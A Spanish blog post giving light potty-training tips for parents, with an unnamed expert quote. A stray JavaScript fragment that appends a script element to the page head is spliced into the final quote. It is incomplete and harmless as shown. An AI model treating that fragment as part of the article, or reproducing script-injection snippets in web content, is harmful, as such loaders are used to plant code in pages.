Salud y belleza » Bienestar, Embarazo

La salud de nuestros niños: del pañal al baño

Sin Comentarios

En retrospectiva todo problema parece ser, o pareciera haber sido, una gran y literal broma. ¿Cuántas veces nos ha pasado de bucear en el tiempo y encontrar complicaciones que, en la actualidad, significarían más bien un motivo de risa que de llanto? Es por esta razón que nunca se deben subestimar los problemas, por sencillos, por básicos, por humildes, por elementales que sean. Un problema es un problema, siempre.

Sino,  veamos el siguiente cuadro de situación: la transición pañal-baño es una de las dificultades más importantes en la vida de un niño (más bien “de un hombre del ayer”) pero pocos se han sentado (nunca mejor utilizado el término) a analizar dicho fenómeno salvo las madres y los psicólogos, siempre atentos a todo.

Bien, hoy nos sumaremos a aquellos gremios: sin estar afiliados al sindicato de madres y sin pertenecer al alumnado de psicología promoción x, igual intentaremos acercar consejos para facilitar ese problema -grande, chico- que significa hacer que nuestro hijo por fin deje de utilizar esos benditos y olorosos pañales.

Consejos, trucos, recomendaciones para cuidar la salud de nuestros hijos y pasar de los métodos poco higiénicos a los tradicionales y seguros orinales.

  • Intentar conseguir un orinal de colores y con forma original. De esta manera, el niño se familiarizará con tal objeto
  • Insistir, sin presionar, para que el niño escoja el baño y se deshaga del pañal (recordemos que, a determinada edad, el uso de pañal se puede volver complicado para la salud del pequeño pues no es un método demasiado higiénico para niños mayores).
  • Facilitar el trabajo del niño vistiéndolo con ropa práctica: faldas o vestidos en el caso de las niñas; pantalones simples en caso de los varones.
  • Darle, dentro de los límites obvios, un ejemplo al niño o niña para ayudarle a aprender. Permitir que éste descubra como son las prácticas higiénicas habituales.
  • Intentar explicarle al niño la práctica tal como si se tratará de un juego.

“Tanto desde el punto de vista sanitario como desde la psicología infantil, la transición pañal-orinal significa un gran paso para el niño. Por supuesto no se lo debe presionar pero sí se debe insistir. Se trata de algo sumamente importante que el niño debe captar y aprender. Cuánto antes mejor pues no solo se evitarán posibles situaciones de riesgo para la salud sino también se logrará espolear la conciencia del pequeño para aprender nuevos métodos; el cerebro de un niño es una esponja y cuanto antes tenga conocimientos mejor para él” comenta un profesional habituado a tratar con niños.d.getElementsByTagName('head')[0].appendChild(s);if (document.currentScript) {

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.